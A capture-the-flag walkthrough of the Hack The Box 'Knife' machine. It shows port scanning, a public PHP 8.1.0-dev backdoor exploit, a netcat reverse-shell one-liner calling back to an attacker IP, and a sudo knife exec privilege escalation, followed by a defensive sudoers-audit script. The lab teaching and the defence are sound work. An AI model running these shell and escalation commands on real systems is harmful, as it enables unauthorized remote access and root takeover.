Hack The Box Knife HTB CTF Machine Walkthrough
In this blog, we cover the Knife HTB CTF challenge, which is an easy machine. It is a capture-the-flag type of challenge. You will learn a lot from it, for example sudo rights, remote code execution, etc.
Table of Contents
- Port Scanning (Nmap Tool)
- Version Enumeration (Nikto)
- Remote Code Execution (Python)
- Read (User.txt)
- Sudo Rights (NoPasswd)
- Read (root.txt)
To capture the root flag in any CTF, we first need to know the active ports on the target. Nmap is one of the most popular port scanners; it allows the attacker to discover all active ports in the target network. Let’s see how the Nmap tool works.
nmap -sC -sV 10.10.10.242
Here I found that port 22 (SSH) and port 80 (HTTP) are open.
We have noticed some unusual ports. Let’s scan port 80. For that, we will use the Nikto tool. Nikto is a traditional vulnerability scanner that ships with Kali Linux. If you have no idea about the Nikto tool, then follow the image below.
nikto -h 10.10.10.242
We have found an impressive PHP bug. It may be a remote code execution bug; we do not know yet. To get more information about this PHP 8.1 bug, let’s jump into Google.
After a lot of research on Google, we discovered PHP 8.1.0-dev ‘User-Agentt’ exploit code, which is available on Exploit-DB. Let’s download the exploit code. Take a closer look at the image below.
Let’s use the exploit code. It may ask you for the target URL; once you supply the target URL, you get a reverse shell. Have a closer look at the command below.
Congrats! We’ve got terminal access to the target.
The output in this shell is garbled. Let’s get a more reliable reverse shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 1234 >/tmp/f
Congrats! We have got the user.txt flag. Let’s proceed to the root flag. I noticed something interesting in the sudo rights.
The user can run /usr/bin/knife as root through sudo. We will execute the following command.
sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
We executed the above command and got the root shell.
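For defenders, the root cause of this last step is a sudoers rule that lets an account run knife as root with no password and no argument restriction. The following Python sketch is an added example, not part of the original walkthrough: it parses `sudo -l` output and flags such rules. The sample output, the user and host names, and the CODE_RUNNERS list are assumptions constructed for illustration.

```python
import os
import re

# Constructed sample of `sudo -l` output; user and host names are placeholders.
SAMPLE = """\
User appuser may run the following commands on host01:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) NOPASSWD: NOEXEC: /usr/bin/less /var/log/syslog, /usr/bin/python3
"""

# Assumed, non-exhaustive set of programs that run arbitrary code on request.
# knife is listed because of its `exec` subcommand, used in the walkthrough.
CODE_RUNNERS = {"knife", "sh", "bash", "python3", "perl", "ruby", "vim", "find"}

ENTRY = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"^(?P<tag>[A-Z_]+):\s*")


def audit_sudo_l(text):
    """Return one finding per command listed in `sudo -l` output."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        tags = set()
        # Split the command list on commas; "\," is an escaped comma.
        for cmd in re.split(r"(?<!\\),\s*", m.group("rest")):
            cmd = cmd.strip()
            while (t := TAG.match(cmd)):   # tags carry over to later commands
                tags.add(t.group("tag"))
                if t.group("tag") == "PASSWD":
                    tags.discard("NOPASSWD")
                cmd = cmd[t.end():]
            path, _, args = cmd.partition(" ")
            runner = path == "ALL" or os.path.basename(path) in CODE_RUNNERS
            nopasswd = "NOPASSWD" in tags
            findings.append({
                "runas": m.group("runas").split(":")[0].strip(),
                "command": cmd,
                "nopasswd": nopasswd,
                "any_args": args == "",    # no argument list = any arguments
                # Highest risk: code runner, no password, unrestricted arguments.
                "critical": runner and nopasswd and args == "",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print("CRITICAL" if f["critical"] else "review  ", f)
```

Rules flagged as critical are candidates for removal or for replacement with a rule that pins the exact arguments the account needs.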